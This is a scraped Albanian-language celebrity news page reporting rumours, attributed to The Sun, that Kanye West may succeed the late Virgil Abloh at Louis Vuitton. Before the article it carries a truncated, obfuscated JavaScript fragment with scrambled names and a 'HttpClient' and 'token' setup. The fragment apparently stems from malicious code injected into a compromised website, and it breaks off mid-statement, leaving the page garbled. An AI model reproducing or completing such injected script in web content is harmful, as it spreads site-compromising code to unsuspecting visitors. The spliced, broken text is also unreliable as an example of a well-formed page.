;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Përflitet se Kanye West do të zë një pozitë shumë të lakmueshme!

By

Kanye West thuhet se po shihet si drejtori i ardhshëm kreativ i Louis Vuitton pas vdekjes së Virgil Abloh.

Sipas The Sun, West dhe Abloh ‘indikuan’ marrjen e supozuar të reperit 44-vjeçar përpara vdekjes së stilistit të ndjerë.

Abloh, i cili shërbeu si drejtor artistik i markës luksoze për veshjet e meshkujve, vdiq më 28 nëntor pasi luftoi me një formë të rrallë kanceri, angiosarkoma kardiake, për dy vjet. Ai ishte 41 vjeçar.

“Kanye është i dëshpëruar për vdekjen e Virgil sepse ata kishin qenë miq prej vitesh dhe punonin shumë së bashku”, tha një burim për gazetën të mërkurën.

Ata ndanë një vizion të ngjashëm dhe tani Kanye ndjen se i detyrohet Virgil të vazhdojë punën e tij në Louis Vuitton.

Në vitin 2009, West dhe Abloh u takuan ndërsa shërbenin si praktikantë për markën luksoze italiane Fendi në Romë, Itali. Aty lindi miqësia 12-vjeçare e dyshes. /Prive.al

Artikuj të ngjashëm